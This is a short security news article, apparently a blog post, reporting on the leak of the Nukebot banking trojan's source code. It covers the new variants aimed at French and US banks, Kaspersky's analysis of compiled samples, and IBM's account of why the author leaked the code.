It is a new ball game for us computer users. It has been confirmed that there is a new version of the Nukebot banking trojan after some opportunistic criminals have leaked the source code to be used by others. Now, this new variant has been targeting France and the United States banks, while another group has adapted the source code to steal mail client and browser passwords.
This information about the leak was disclosed by the malware’s author known as Gosya last March and he posted a link to the source code which have been downloaded in a number of black market forums.
Malware researchers have said there are a number of variants in the wild. This has been confirmed by Kaspersky Labs with their compiled samples of Nukebot variants created since the leak and some of them appear to be test samples.
Some of the code seem benign due to the fact that they are test samples which does not link to a valid Command & Control address. However, there have been some that had genuine addresses and appear to be operational.
Yunakovsky of Kaspersky Lab said that among the compiled samples, approximately five percent are being used in attacks. Although it seems to be that some criminals have been using the code or they might be an organized group altogether.
Of those used in attacks, Yunakovsky said that an analysis of the web injections in the code indicate an interest in compromising banks in France and the U.S.
Some of the test samples Kaspersky Lab has in its possession are plain-text strings, and researchers were able to extract command and control addresses and other data used in analysis from the malware. The operational versions of Nukebot, however, were encrypted, requiring researchers to first extract the keys in order to establish the string values, Yunakovsky said.
“In order to trigger web injections, we had to imitate interaction with C&C servers. The C&C addresses can be obtained from the string initialization procedure,” Yunakovsky said. “When first contacting a C&C, the bot is sent an RC4 key which it uses to decrypt injections. We used this simple logic when implementing an imitation bot, and managed to collect web injections from a large number of servers.
“Initially, the majority of botnets only received test injects that were of no interest to us,” Yunakovsky said. Later, however, we identified a number of NukeBot’s ‘combat versions.’”
Some modified versions of Nukebot did not have web injections, Yunakovsky said. Those instead are spread via droppers, and after they’re unpacked, the malware downloads a number of password recovery utilities from a remote server under the attacker’s control.
There are speculations why the Nukebot source code was leaked. Late last March, IBM announced the leak and pointed out that Gosya, the malware author has lost trust in the underground forums.
The source code was up for for sale in the beginning before it was verified by forum administrators. Complications arose and led to his ban when they found out that the malware was also being sold on different forums under a different name which he dubbed (Micro Banking Trojan).
“When fraudsters realized that the same person was trying to vend under different names, they got even more suspicious that he was a ripper, misrepresenting or selling a product he does not possess,” Kessem and Kolmanovich of IBM wrote.
Nukebot appeared in December 2016 on the underground. The banking malware not only arrived fashioned with web injects for a number of financials institutions, but also included man-in-the-browser functionality, according to researchers from Arbor Networks. IBM said the malware was well designed to steal banking login data.
Which leads us to question… what will happen next and how will this affect us?
